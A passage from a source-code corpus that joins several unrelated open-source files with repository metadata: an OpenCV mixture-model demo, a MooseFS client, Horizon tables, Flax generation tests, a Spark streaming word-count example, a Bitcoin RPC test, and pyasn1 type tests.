ang = np.arctan2(u[1, 0], u[0, 0])*(180/np.pi)
s1, s2 = np.sqrt(w)*3.0
cv2.ellipse(img, (x, y), (s1, s2), ang, 0, 360, color, 1, cv2.CV_AA)
if __name__ == '__main__':
cluster_n = 5
img_size = 512
print 'press any key to update distributions, ESC - exit\n'
while True:
print 'sampling distributions...'
points, ref_distrs = make_gaussians(cluster_n, img_size)
print 'EM (opencv) ...'
em = cv2.EM(cluster_n, cv2.EM_COV_MAT_GENERIC)
em.train(points)
means = em.getMat('means')
covs = em.getMatVector('covs')
found_distrs = zip(means, covs)
print 'ready!\n'
img = np.zeros((img_size, img_size, 3), np.uint8)
for x, y in np.int32(points):
cv2.circle(img, (x, y), 1, (255, 255, 255), -1)
for m, cov in ref_distrs:
draw_gaussain(img, m, cov, (0, 255, 0))
for m, cov in found_distrs:
draw_gaussain(img, m, cov, (0, 0, 255))
cv2.imshow('gaussian mixture', img)
ch = 0xFF & cv2.waitKey(0)
if ch == 27:
break
cv2.destroyAllWindows()
| apache-2.0 |
fe11x/dpark | dpark/moosefs/master.py | 14 | 10945 | import os
import socket
import threading
import Queue
import time
import struct
import logging
from consts import *
from utils import *
logger = logging.getLogger(__name__)
# mfsmaster need to been patched with dcache
ENABLE_DCACHE = False
class StatInfo:
def __init__(self, totalspace, availspace, trashspace,
reservedspace, inodes):
self.totalspace = totalspace
self.availspace = availspace
self.trashspace = trashspace
self.reservedspace = reservedspace
self.inodes = inodes
class Chunk:
def __init__(self, id, length, version, csdata):
self.id = id
self.length = length
self.version = version
self.addrs = self._parse(csdata)
def _parse(self, csdata):
return [(socket.inet_ntoa(csdata[i:i+4]),
unpack("H", csdata[i+4:i+6])[0])
for i in range(len(csdata))[::6]]
def __repr__(self):
return "<Chunk(%d, %d, %d)>" % (self.id, self.version, self.length)
def try_again(f):
def _(self, *a, **kw):
for i in range(3):
try:
return f(self, *a, **kw)
except IOError, e:
self.close()
logger.warning("mfs master connection: %s", e)
time.sleep(2**i*0.1)
else:
raise
return _
def spawn(target, *args, **kw):
t = threading.Thread(target=target, name=target.__name__, args=args, kwargs=kw)
t.daemon = True
t.start()
return t
class MasterConn:
def __init__(self, host='mfsmaster', port=9421):
self.host = host
self.port = port
self.uid = os.getuid()
self.gid = os.getgid()
self.sessionid = 0
self.conn = None
self.packetid = 0
self.fail_count = 0
self.dcache = {}
self.dstat = {}
self.lock = threading.RLock()
self.reply = Queue.Queue()
self.is_ready = False
spawn(self.heartbeat)
spawn(self.recv_thread)
def heartbeat(self):
while True:
try:
self.nop()
except Exception, e:
self.close()
time.sleep(2)
def connect(self):
if self.conn is not None:
return
for _ in range(10):
try:
self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.conn.connect((self.host, self.port))
break
except socket.error, e:
self.conn = None
#self.next_try = time.time() + 1.5 ** self.fail_count
self.fail_count += 1
time.sleep(1.5 ** self.fail_count)
if not self.conn:
raise IOError("mfsmaster not availbale")
regbuf = pack(CUTOMA_FUSE_REGISTER, FUSE_REGISTER_BLOB_NOACL,
self.sessionid, VERSION)
self.send(regbuf)
recv = self.recv(8)
cmd, i = unpack("II", recv)
if cmd != MATOCU_FUSE_REGISTER:
raise Exception("got incorrect answer from mfsmaster %s" % cmd)
if i not in (1, 4):
raise Exception("got incorrect size from mfsmaster")
data = self.recv(i)
if i == 1:
code, = unpack("B", data)
if code != 0:
raise Exception("mfsmaster register error: "
+ mfs_strerror(code))
if self.sessionid == 0:
self.sessionid, = unpack("I", data)
self.is_ready = True
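    # Note added for clarity (not in the original): connect() retries up to 10 times with a
    # simple exponential back-off of 1.5 ** fail_count seconds before registering the FUSE
    # session, so after three consecutive failures the next attempt waits about 3.4 seconds.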
def close(self):
with self.lock:
if self.conn:
self.conn.close()
self.conn = None
self.dcache.clear()
self.is_ready = False
def send(self, buf):
with self.lock:
conn = self.conn
if not conn:
raise IOError("not connected")
n = conn.send(buf)
while n < len(buf):
sent = conn.send(buf[n:])
if not sent:
self.close()
raise IOError("write to master failed")
n += sent
def nop(self):
with self.lock:
self.connect()
msg = pack(ANTOAN_NOP, 0)
self.send(msg)
def recv(self, n):
with self.lock:
conn = self.conn
if not conn:
raise IOError("not connected")
r = conn.recv(n)
while len(r) < n:
rr = conn.recv(n - len(r))
if not rr:
self.close()
raise IOError("unexpected error: need %d" % (n-len(r)))
r += rr
return r
def recv_cmd(self):
d = self.recv(12)
cmd, size = unpack("II", d)
data = self.recv(size-4) if size > 4 else ''
while cmd in (ANTOAN_NOP, MATOCU_FUSE_NOTIFY_ATTR, MATOCU_FUSE_NOTIFY_DIR):
if cmd == ANTOAN_NOP:
pass
elif cmd == MATOCU_FUSE_NOTIFY_ATTR:
while len(data) >= 43:
parent, inode = unpack("II", data)
attr = data[8:43]
if parent in self.dcache:
cache = self.dcache[parent]
for name in cache:
if cache[name].inode == inode:
cache[name] = attrToFileInfo(inode, attr)
break
data = data[43:]
elif cmd == MATOCU_FUSE_NOTIFY_DIR:
while len(data) >= 4:
inode, = unpack("I", data)
if inode in self.dcache:
del self.dcache[inode]
with self.lock:
self.send(pack(CUTOMA_FUSE_DIR_REMOVED, 0, inode))
data = data[4:]
d = self.recv(12)
cmd, size = unpack("II", d)
data = self.recv(size-4) if size > 4 else ''
return d, data
def recv_thread(self):
while True:
with self.lock:
if not self.is_ready:
time.sleep(0.01)
continue
try:
r = self.recv_cmd()
self.reply.put(r)
except IOError, e:
self.reply.put(e)
@try_again
def sendAndReceive(self, cmd, *args):
#print 'sendAndReceive', cmd, args
self.packetid += 1
msg = pack(cmd, self.packetid, *args)
with self.lock:
self.connect()
while not self.reply.empty():
self.reply.get_nowait()
self.send(msg)
r = self.reply.get()
if isinstance(r, Exception):
raise r
h, d = r
rcmd, size, pid = unpack("III", h)
if rcmd != cmd+1 or pid != self.packetid or size <= 4:
self.close()
raise Exception("incorrect answer (%s!=%s, %s!=%s, %d<=4",
rcmd, cmd+1, pid, self.packetid, size)
if len(d) == 1 and ord(d[0]) != 0:
raise Error(ord(d[0]))
return d
def statfs(self):
ans = self.sendAndReceive(CUTOMA_FUSE_STATFS)
return StatInfo(*unpack("QQQQI", ans))
# def access(self, inode, modemask):
# return self.sendAndReceive(CUTOMA_FUSE_ACCESS, inode,
# self.uid, self.gid, uint8(modemask))
#
def lookup(self, parent, name):
if ENABLE_DCACHE:
cache = self.dcache.get(parent)
if cache is None and self.dstat.get(parent, 0) > 1:
cache = self.getdirplus(parent)
if cache is not None:
return cache.get(name), None
self.dstat[parent] = self.dstat.get(parent, 0) + 1
ans = self.sendAndReceive(CUTOMA_FUSE_LOOKUP, parent,
uint8(len(name)), name, 0, 0)
if len(ans) == 1:
return None, ""
if len(ans) != 39:
raise Exception("bad length")
inode, = unpack("I", ans)
return attrToFileInfo(inode, ans[4:]), None
def getattr(self, inode):
ans = self.sendAndReceive(CUTOMA_FUSE_GETATTR, inode,
self.uid, self.gid)
return attrToFileInfo(inode, ans)
def readlink(self, inode):
ans = self.sendAndReceive(CUTOMA_FUSE_READLINK, inode)
length, = unpack("I", ans)
if length+4 != len(ans):
raise Exception("invalid length")
return ans[4:-1]
def getdir(self, inode):
"return: {name: (inode,type)}"
ans = self.sendAndReceive(CUTOMA_FUSE_GETDIR, inode,
self.uid, self.gid)
p = 0
names = {}
while p < len(ans):
length, = unpack("B", ans[p:p+1])
p += 1
if length + p + 5 > len(ans):
break
name = ans[p:p+length]
p += length
            inode, type = unpack("IB", ans[p:p+5])
names[name] = (inode, type)
p += 5
return names
def getdirplus(self, inode):
"return {name: FileInfo()}"
if ENABLE_DCACHE:
infos = self.dcache.get(inode)
if infos is not None:
return infos
flag = GETDIR_FLAG_WITHATTR
if ENABLE_DCACHE:
flag |= GETDIR_FLAG_DIRCACHE
ans = self.sendAndReceive(CUTOMA_FUSE_GETDIR, inode,
self.uid, self.gid, uint8(flag))
p = 0
infos = {}
while p < len(ans):
length, = unpack("B", ans[p:p+1])
p += 1
name = ans[p:p+length]
p += length
i, = unpack("I", ans[p:p+4])
attr = ans[p+4:p+39]
infos[name] = attrToFileInfo(i, attr, name)
p += 39
if ENABLE_DCACHE:
self.dcache[inode] = infos
return infos
def opencheck(self, inode, flag=1):
ans = self.sendAndReceive(CUTOMA_FUSE_OPEN, inode,
self.uid, self.gid, uint8(flag))
return ans
def readchunk(self, inode, index):
ans = self.sendAndReceive(CUTOMA_FUSE_READ_CHUNK, inode, index)
n = len(ans)
if n < 20 or (n-20)%6 != 0:
raise Exception("read chunk: invalid length: %s" % n)
length, id, version = unpack("QQI", ans)
return Chunk(id, length, version, ans[20:])
def test():
m = MasterConn("mfsmaster")
m.connect()
m.close()
#print m.get_attr(1)
while True:
print m.getdir(1)
print m.getdirplus(1)
time.sleep(60)
info, err = m.lookup(1, "test.csv")
print info, err
#print m.opencheck(info.inode)
chunks = m.readchunk(info.inode, 0)
print chunks, chunks.addrs
for i in range(1000):
info, err = m.lookup(1, "test.csv")
chunks = m.readchunk(info.inode, 0)
print i,err, chunks
time.sleep(10)
m.close()
if __name__ == '__main__':
test()
| bsd-3-clause |
mrunge/horizon | openstack_dashboard/dashboards/admin/hypervisors/compute/tables.py | 8 | 2749 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.template import defaultfilters as filters
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext_lazy
from horizon import tables
from horizon.utils import filters as utils_filters
from openstack_dashboard import api
class EvacuateHost(tables.LinkAction):
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Evacuate Host",
u"Evacuate Hosts",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Evacuated Host",
u"Evacuated Hosts",
count
)
name = "evacuate"
verbose_name = _("Evacuate Host")
url = "horizon:admin:hypervisors:compute:evacuate_host"
classes = ("ajax-modal", "btn-migrate")
policy_rules = (("compute", "compute_extension:evacuate"),)
def __init__(self, **kwargs):
super(EvacuateHost, self).__init__(**kwargs)
self.name = kwargs.get('name', self.name)
def allowed(self, request, instance):
if not api.nova.extension_supported('AdminActions', request):
return False
return self.datum.state == "down"
class ComputeHostFilterAction(tables.FilterAction):
def filter(self, table, services, filter_string):
q = filter_string.lower()
return filter(lambda service: q in service.type.lower(), services)
class ComputeHostTable(tables.DataTable):
host = tables.Column('host', verbose_name=_('Host'))
zone = tables.Column('zone', verbose_name=_('Zone'))
status = tables.Column('status', verbose_name=_('Status'))
state = tables.Column('state', verbose_name=_('State'))
updated_at = tables.Column('updated_at',
verbose_name=_('Updated At'),
filters=(utils_filters.parse_isotime,
filters.timesince))
def get_object_id(self, obj):
return obj.host
class Meta:
name = "compute_host"
verbose_name = _("Compute Host")
table_actions = (ComputeHostFilterAction,)
multi_select = False
row_actions = (EvacuateHost,)
| apache-2.0 |
huggingface/transformers | tests/test_generation_flax_utils.py | 1 | 9361 | # Copyright 2021 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import random
import numpy as np
from transformers import is_flax_available
from transformers.testing_utils import require_flax
if is_flax_available():
import os
import jax
import jax.numpy as jnp
from jax import jit
os.environ["XLA_PYTHON_CLIENT_MEM_FRACTION"] = "0.12" # assumed parallelism: 8
def ids_tensor(shape, vocab_size, rng=None):
"""Creates a random int32 tensor of the shape within the vocab size."""
if rng is None:
rng = random.Random()
total_dims = 1
for dim in shape:
total_dims *= dim
values = []
for _ in range(total_dims):
values.append(rng.randint(0, vocab_size - 1))
output = np.array(values, dtype=jnp.int32).reshape(shape)
return output
def random_attention_mask(shape, rng=None):
attn_mask = ids_tensor(shape, vocab_size=2, rng=rng)
# make sure that at least one token is attended to for each batch
attn_mask[:, -1] = 1
return attn_mask
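# Illustrative usage of the two helpers above (shapes and vocab size are arbitrary):
#   dummy_ids = ids_tensor((2, 5), vocab_size=100)   # int32 values in [0, 99]
#   dummy_mask = random_attention_mask((2, 5))       # 0/1 mask; last column forced to 1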
@require_flax
class FlaxGenerationTesterMixin:
model_tester = None
all_generative_model_classes = ()
def _get_input_ids_and_config(self):
config, inputs = self.model_tester.prepare_config_and_inputs_for_common()
# cut to half length & take max batch_size 3
max_batch_size = 2
sequence_length = inputs["input_ids"].shape[-1] // 2
input_ids = inputs["input_ids"][:max_batch_size, :sequence_length]
attention_mask = jnp.ones_like(input_ids)
attention_mask = attention_mask[:max_batch_size, :sequence_length]
# generate max 5 tokens
max_length = input_ids.shape[-1] + 5
if config.eos_token_id is not None and config.pad_token_id is None:
# hack to allow generate for models such as GPT2 as is done in `generate()`
config.pad_token_id = config.eos_token_id
return config, input_ids, attention_mask, max_length
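    # Each test below follows the same recipe: set the decoding options on the
    # model config, run model.generate eagerly, then run a jit-compiled generate
    # and check that both produce identical sequences of the expected max length.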
def test_greedy_generate(self):
config, input_ids, _, max_length = self._get_input_ids_and_config()
config.do_sample = False
config.max_length = max_length
for model_class in self.all_generative_model_classes:
model = model_class(config)
generation_outputs = model.generate(input_ids).sequences
self.assertEqual(generation_outputs.shape[-1], max_length)
jit_generate = jit(model.generate)
jit_generation_outputs = jit_generate(input_ids).sequences
self.assertListEqual(generation_outputs.tolist(), jit_generation_outputs.tolist())
def test_sample_generate(self):
config, input_ids, _, max_length = self._get_input_ids_and_config()
config.do_sample = True
config.max_length = max_length
for model_class in self.all_generative_model_classes:
model = model_class(config)
generation_outputs = model.generate(input_ids).sequences
self.assertEqual(generation_outputs.shape[-1], max_length)
jit_generate = jit(model.generate)
jit_generation_outputs = jit_generate(input_ids).sequences
self.assertListEqual(generation_outputs.tolist(), jit_generation_outputs.tolist())
def test_beam_search_generate(self):
config, input_ids, _, max_length = self._get_input_ids_and_config()
config.do_sample = False
config.max_length = max_length
config.num_beams = 2
for model_class in self.all_generative_model_classes:
model = model_class(config)
generation_outputs = model.generate(input_ids).sequences
self.assertEqual(generation_outputs.shape[-1], max_length)
jit_generate = jit(model.generate)
jit_generation_outputs = jit_generate(input_ids).sequences
self.assertListEqual(generation_outputs.tolist(), jit_generation_outputs.tolist())
def test_sample_generate_logits_warper(self):
config, input_ids, _, max_length = self._get_input_ids_and_config()
config.do_sample = True
config.max_length = max_length
config.temperature = 0.8
config.top_k = 10
config.top_p = 0.3
config.min_length = 1
config.forced_bos_token_id = 8
config.forced_eos_token_id = 9
for model_class in self.all_generative_model_classes:
model = model_class(config)
generation_outputs = model.generate(input_ids).sequences
self.assertEqual(generation_outputs.shape[-1], max_length)
jit_generate = jit(model.generate)
jit_generation_outputs = jit_generate(input_ids).sequences
self.assertListEqual(generation_outputs.tolist(), jit_generation_outputs.tolist())
def test_greedy_generate_logits_warper(self):
config, input_ids, _, max_length = self._get_input_ids_and_config()
config.max_length = max_length
config.min_length = 1
config.forced_bos_token_id = 8
config.forced_eos_token_id = 9
for model_class in self.all_generative_model_classes:
model = model_class(config)
generation_outputs = model.generate(input_ids).sequences
self.assertEqual(generation_outputs.shape[-1], max_length)
jit_generate = jit(model.generate)
jit_generation_outputs = jit_generate(input_ids).sequences
self.assertListEqual(generation_outputs.tolist(), jit_generation_outputs.tolist())
def test_beam_search_generate_logits_warper(self):
config, input_ids, _, max_length = self._get_input_ids_and_config()
config.max_length = max_length
config.num_beams = 2
config.min_length = 1
config.forced_bos_token_id = 8
config.forced_eos_token_id = 9
for model_class in self.all_generative_model_classes:
model = model_class(config)
generation_outputs = model.generate(input_ids).sequences
self.assertEqual(generation_outputs.shape[-1], max_length)
jit_generate = jit(model.generate)
jit_generation_outputs = jit_generate(input_ids).sequences
self.assertListEqual(generation_outputs.tolist(), jit_generation_outputs.tolist())
def test_greedy_generate_attn_mask(self):
config, input_ids, attention_mask, max_length = self._get_input_ids_and_config()
# pad attention mask on the left
attention_mask = jax.ops.index_update(attention_mask, (0, 0), 0)
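        # (jax.ops.index_update is the legacy functional-update API; on newer JAX
        # releases the same update would be written attention_mask.at[0, 0].set(0).)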
config.do_sample = False
config.max_length = max_length
for model_class in self.all_generative_model_classes:
model = model_class(config)
generation_outputs = model.generate(input_ids, attention_mask=attention_mask).sequences
self.assertEqual(generation_outputs.shape[-1], max_length)
jit_generate = jit(model.generate)
jit_generation_outputs = jit_generate(input_ids, attention_mask=attention_mask).sequences
self.assertListEqual(generation_outputs.tolist(), jit_generation_outputs.tolist())
def test_sample_generate_attn_mask(self):
config, input_ids, attention_mask, max_length = self._get_input_ids_and_config()
# pad attention mask on the left
attention_mask = jax.ops.index_update(attention_mask, (0, 0), 0)
config.do_sample = True
config.max_length = max_length
for model_class in self.all_generative_model_classes:
model = model_class(config)
generation_outputs = model.generate(input_ids, attention_mask=attention_mask).sequences
self.assertEqual(generation_outputs.shape[-1], max_length)
jit_generate = jit(model.generate)
jit_generation_outputs = jit_generate(input_ids, attention_mask=attention_mask).sequences
self.assertListEqual(generation_outputs.tolist(), jit_generation_outputs.tolist())
def test_beam_search_generate_attn_mask(self):
config, input_ids, attention_mask, max_length = self._get_input_ids_and_config()
# pad attention mask on the left
attention_mask = jax.ops.index_update(attention_mask, (0, 0), 0)
config.num_beams = 2
config.max_length = max_length
for model_class in self.all_generative_model_classes:
model = model_class(config)
generation_outputs = model.generate(input_ids, attention_mask=attention_mask).sequences
self.assertEqual(generation_outputs.shape[-1], max_length)
jit_generate = jit(model.generate)
jit_generation_outputs = jit_generate(input_ids, attention_mask=attention_mask).sequences
self.assertListEqual(generation_outputs.tolist(), jit_generation_outputs.tolist())
| apache-2.0 |
maropu/spark | examples/src/main/python/sql/streaming/structured_network_wordcount.py | 27 | 2500 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
r"""
Counts words in UTF8 encoded, '\n' delimited text received from the network.
Usage: structured_network_wordcount.py <hostname> <port>
<hostname> and <port> describe the TCP server that Structured Streaming
would connect to receive data.
To run this on your local machine, you need to first run a Netcat server
`$ nc -lk 9999`
and then run the example
`$ bin/spark-submit examples/src/main/python/sql/streaming/structured_network_wordcount.py
localhost 9999`
"""
import sys
from pyspark.sql import SparkSession
from pyspark.sql.functions import explode
from pyspark.sql.functions import split
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: structured_network_wordcount.py <hostname> <port>", file=sys.stderr)
sys.exit(-1)
host = sys.argv[1]
port = int(sys.argv[2])
spark = SparkSession\
.builder\
.appName("StructuredNetworkWordCount")\
.getOrCreate()
# Create DataFrame representing the stream of input lines from connection to host:port
lines = spark\
.readStream\
.format('socket')\
.option('host', host)\
.option('port', port)\
.load()
# Split the lines into words
words = lines.select(
# explode turns each item in an array into a separate row
explode(
split(lines.value, ' ')
).alias('word')
)
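    # For example, an input line "apache spark" is split and exploded into two
    # rows, word='apache' and word='spark'.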
# Generate running word count
wordCounts = words.groupBy('word').count()
# Start running the query that prints the running counts to the console
query = wordCounts\
.writeStream\
.outputMode('complete')\
.format('console')\
.start()
query.awaitTermination()
| apache-2.0 |
jonasschnelli/bitcoin | test/functional/rpc_deprecated.py | 6 | 3063 | #!/usr/bin/env python3
# Copyright (c) 2017-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test deprecation of RPC calls."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_raises_rpc_error, find_vout_for_address
class DeprecatedRpcTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
self.extra_args = [[], ['-deprecatedrpc=bumpfee']]
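        # Node 0 runs with defaults, so the deprecated watch-only bumpfee raises;
        # node 1 opts back into the old behaviour via -deprecatedrpc=bumpfee.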
def run_test(self):
# This test should be used to verify correct behaviour of deprecated
# RPC methods with and without the -deprecatedrpc flags. For example:
#
# In set_test_params:
# self.extra_args = [[], ["-deprecatedrpc=generate"]]
#
# In run_test:
# self.log.info("Test generate RPC")
# assert_raises_rpc_error(-32, 'The wallet generate rpc method is deprecated', self.nodes[0].rpc.generate, 1)
# self.nodes[1].generate(1)
if self.is_wallet_compiled():
self.log.info("Test bumpfee RPC")
self.nodes[0].generate(101)
self.nodes[0].createwallet(wallet_name='nopriv', disable_private_keys=True)
noprivs0 = self.nodes[0].get_wallet_rpc('nopriv')
w0 = self.nodes[0].get_wallet_rpc(self.default_wallet_name)
self.nodes[1].createwallet(wallet_name='nopriv', disable_private_keys=True)
noprivs1 = self.nodes[1].get_wallet_rpc('nopriv')
address = w0.getnewaddress()
desc = w0.getaddressinfo(address)['desc']
change_addr = w0.getrawchangeaddress()
change_desc = w0.getaddressinfo(change_addr)['desc']
txid = w0.sendtoaddress(address=address, amount=10)
vout = find_vout_for_address(w0, txid, address)
self.nodes[0].generate(1)
rawtx = w0.createrawtransaction([{'txid': txid, 'vout': vout}], {w0.getnewaddress(): 5}, 0, True)
rawtx = w0.fundrawtransaction(rawtx, {'changeAddress': change_addr})
signed_tx = w0.signrawtransactionwithwallet(rawtx['hex'])['hex']
noprivs0.importmulti([{'desc': desc, 'timestamp': 0}, {'desc': change_desc, 'timestamp': 0, 'internal': True}])
noprivs1.importmulti([{'desc': desc, 'timestamp': 0}, {'desc': change_desc, 'timestamp': 0, 'internal': True}])
txid = w0.sendrawtransaction(signed_tx)
self.sync_all()
assert_raises_rpc_error(-32, 'Using bumpfee with wallets that have private keys disabled is deprecated. Use psbtbumpfee instead or restart bitcoind with -deprecatedrpc=bumpfee. This functionality will be removed in 0.22', noprivs0.bumpfee, txid)
bumped_psbt = noprivs1.bumpfee(txid)
assert 'psbt' in bumped_psbt
else:
self.log.info("No tested deprecated RPC methods")
if __name__ == '__main__':
DeprecatedRpcTest().main()
| mit |
pexip/os-pyasn1 | tests/type/test_univ.py | 6 | 62254 | #
# This file is part of pyasn1 software.
#
# Copyright (c) 2005-2017, Ilya Etingof <[email protected]>
# License: http://snmplabs.com/pyasn1/license.html
#
import math
import pickle
import sys
try:
import unittest2 as unittest
except ImportError:
import unittest
from tests.base import BaseTestCase
from pyasn1.type import univ
from pyasn1.type import tag
from pyasn1.type import constraint
from pyasn1.type import namedtype
from pyasn1.type import namedval
from pyasn1.type import error
from pyasn1.compat.octets import str2octs, ints2octs, octs2ints
from pyasn1.error import PyAsn1Error
class NoValueTestCase(BaseTestCase):
def testSingleton(self):
assert univ.NoValue() is univ.NoValue(), 'NoValue is not a singleton'
def testRepr(self):
try:
repr(univ.noValue)
except PyAsn1Error:
assert False, 'repr() on NoValue object fails'
def testIsInstance(self):
try:
assert isinstance(univ.noValue, univ.NoValue), 'isinstance() on NoValue() object fails'
except PyAsn1Error:
assert False, 'isinstance() on NoValue object fails'
def testStr(self):
try:
str(univ.noValue)
except PyAsn1Error:
pass
else:
assert False, 'str() works for NoValue object'
def testLen(self):
try:
len(univ.noValue)
except PyAsn1Error:
pass
else:
assert False, 'len() works for NoValue object'
def testCmp(self):
try:
univ.noValue == 1
except PyAsn1Error:
pass
else:
assert False, 'comparison works for NoValue object'
def testSubs(self):
try:
univ.noValue[0]
except PyAsn1Error:
pass
else:
assert False, '__getitem__() works for NoValue object'
def testKey(self):
try:
univ.noValue['key']
except PyAsn1Error:
pass
else:
assert False, '__getitem__() works for NoValue object'
def testKeyAssignment(self):
try:
univ.noValue['key'] = 123
except PyAsn1Error:
pass
else:
assert False, '__setitem__() works for NoValue object'
def testInt(self):
try:
int(univ.noValue)
except PyAsn1Error:
pass
else:
assert False, 'integer conversion works for NoValue object'
def testAdd(self):
try:
univ.noValue + univ.noValue
except PyAsn1Error:
pass
else:
assert False, 'addition works for NoValue object'
def testBitShift(self):
try:
univ.noValue << 1
except PyAsn1Error:
pass
else:
assert False, 'bitshift works for NoValue object'
def testBooleanEvaluation(self):
try:
if univ.noValue:
pass
except PyAsn1Error:
pass
else:
assert False, 'boolean evaluation works for NoValue object'
def testSizeOf(self):
try:
if hasattr(sys, 'getsizeof'):
sys.getsizeof(univ.noValue)
except PyAsn1Error:
assert False, 'sizeof failed for NoValue object'
class IntegerTestCase(BaseTestCase):
def testStr(self):
assert str(univ.Integer(1)) in ('1', '1L'), 'str() fails'
def testRepr(self):
assert '123' in repr(univ.Integer(123))
def testAnd(self):
assert univ.Integer(1) & 0 == 0, '__and__() fails'
def testOr(self):
assert univ.Integer(1) | 0 == 1, '__or__() fails'
def testXor(self):
assert univ.Integer(1) ^ 0 == 1, '__xor__() fails'
def testRand(self):
assert 0 & univ.Integer(1) == 0, '__rand__() fails'
def testRor(self):
assert 0 | univ.Integer(1) == 1, '__ror__() fails'
def testRxor(self):
assert 0 ^ univ.Integer(1) == 1, '__rxor__() fails'
def testAdd(self):
assert univ.Integer(-4) + 6 == 2, '__add__() fails'
def testRadd(self):
assert 4 + univ.Integer(5) == 9, '__radd__() fails'
def testSub(self):
assert univ.Integer(3) - 6 == -3, '__sub__() fails'
def testRsub(self):
assert 6 - univ.Integer(3) == 3, '__rsub__() fails'
def testMul(self):
assert univ.Integer(3) * -3 == -9, '__mul__() fails'
def testRmul(self):
assert 2 * univ.Integer(3) == 6, '__rmul__() fails'
def testDivInt(self):
assert univ.Integer(4) / 2 == 2, '__div__() fails'
if sys.version_info[0] > 2:
def testDivFloat(self):
assert univ.Integer(3) / 2 == 1.5, '__div__() fails'
def testRdivFloat(self):
assert 3 / univ.Integer(2) == 1.5, '__rdiv__() fails'
else:
def testDivFloat(self):
assert univ.Integer(3) / 2 == 1, '__div__() fails'
def testRdivFloat(self):
assert 3 / univ.Integer(2) == 1, '__rdiv__() fails'
def testRdivInt(self):
assert 6 / univ.Integer(3) == 2, '__rdiv__() fails'
if sys.version_info[0] > 2:
def testTrueDiv(self):
assert univ.Integer(3) / univ.Integer(2) == 1.5, '__truediv__() fails'
def testFloorDiv(self):
assert univ.Integer(3) // univ.Integer(2) == 1, '__floordiv__() fails'
def testMod(self):
assert univ.Integer(3) % 2 == 1, '__mod__() fails'
def testRmod(self):
assert 4 % univ.Integer(3) == 1, '__rmod__() fails'
def testPow(self):
assert univ.Integer(3) ** 2 == 9, '__pow__() fails'
def testRpow(self):
assert 2 ** univ.Integer(2) == 4, '__rpow__() fails'
def testLshift(self):
assert univ.Integer(1) << 1 == 2, '<< fails'
def testRshift(self):
assert univ.Integer(2) >> 1 == 1, '>> fails'
def testInt(self):
assert int(univ.Integer(3)) == 3, '__int__() fails'
def testLong(self):
assert int(univ.Integer(8)) == 8, '__long__() fails'
def testFloat(self):
assert float(univ.Integer(4)) == 4.0, '__float__() fails'
def testPos(self):
assert +univ.Integer(1) == 1, '__pos__() fails'
def testNeg(self):
assert -univ.Integer(1) == -1, '__neg__() fails'
def testInvert(self):
assert ~univ.Integer(1) == -2, '__invert__() fails'
def testRound(self):
assert round(univ.Integer(1), 3) == 1.0, '__round__() fails'
def testFloor(self):
assert math.floor(univ.Integer(1)) == 1, '__floor__() fails'
def testCeil(self):
assert math.ceil(univ.Integer(1)) == 1, '__ceil__() fails'
if sys.version_info[0:2] > (2, 5):
def testTrunc(self):
assert math.trunc(univ.Integer(1)) == 1, '__trunc__() fails'
def testPrettyIn(self):
assert univ.Integer('3') == 3, 'prettyIn() fails'
def testTag(self):
assert univ.Integer().tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 0x02)
)
def testNamedVals(self):
class Integer(univ.Integer):
namedValues = univ.Integer.namedValues.clone(('asn1', 1))
assert Integer('asn1') == 1, 'named val fails'
assert int(Integer('asn1')) == 1, 'named val fails'
assert str(Integer('asn1')) == 'asn1', 'named val __str__() fails'
def testSubtype(self):
assert univ.Integer().subtype(
value=1,
implicitTag=tag.Tag(tag.tagClassPrivate, tag.tagFormatSimple, 2),
subtypeSpec=constraint.SingleValueConstraint(1, 3)
) == univ.Integer(
value=1,
tagSet=tag.TagSet(tag.Tag(tag.tagClassPrivate,
tag.tagFormatSimple, 2)),
subtypeSpec=constraint.ConstraintsIntersection(constraint.SingleValueConstraint(1, 3))
)
class IntegerPicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.Integer()
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.Integer
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.Integer(-123)
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1 == -123
class BooleanTestCase(BaseTestCase):
def testTruth(self):
assert univ.Boolean(True) and univ.Boolean(1), 'Truth initializer fails'
def testFalse(self):
assert not univ.Boolean(False) and not univ.Boolean(0), 'False initializer fails'
def testStr(self):
assert str(univ.Boolean(1)) == 'True', 'str() fails'
def testInt(self):
assert int(univ.Boolean(1)) == 1, 'int() fails'
def testRepr(self):
